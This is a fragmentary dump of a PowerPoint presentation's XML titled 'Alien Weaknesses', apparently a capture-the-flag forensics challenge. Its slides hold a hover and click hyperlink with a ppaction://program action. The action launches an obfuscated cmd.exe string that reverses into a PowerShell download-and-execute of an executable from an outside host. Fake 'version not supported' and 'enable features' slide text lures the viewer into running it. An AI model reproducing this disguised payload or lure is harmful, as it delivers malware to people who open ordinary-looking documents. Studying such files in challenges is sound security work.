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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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BD26-D248-4046-86A8-E3243D84112E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BBDB-77B0-47EF-AF58-99A32DCEC5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0BD26-D248-4046-86A8-E3243D84112E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CBBDB-77B0-47EF-AF58-99A32DCEC5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cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&amp;&amp;for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&amp;&amp;if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22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cmd.ex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hlinkHover r:id="rId2" action="ppaction://program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464820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Error: This version of PowerPoint is not supported. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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Please update and try again.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1000" y="4495800"/>
            <a:ext cx="85344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5105400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presentation uses advanced PowerPoint features. Push F5 to start presentation and enable these features when prompted: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4724400"/>
            <a:ext cx="3067050" cy="172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5638800" y="6096000"/>
            <a:ext cx="1447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781800" y="4953000"/>
            <a:ext cx="1066800" cy="1066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/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alien Weaknesses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1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Action Plan: Take Back Earth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="pngfind.com-secret-png-1547351.png">
            <a:hlinkClick r:id="rId4" action="ppaction://program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304800" y="-228600"/>
            <a:ext cx="5410200" cy="26622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43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Alien Weaknesses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Alien Weaknesses</dc:title>
  <dc:creator>0xdf</dc:creator>
  <cp:lastModifiedBy>0xdf</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-18T11:18:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-14T11:06:33Z</dcterms:modified>
</cp:coreProperties>
</file>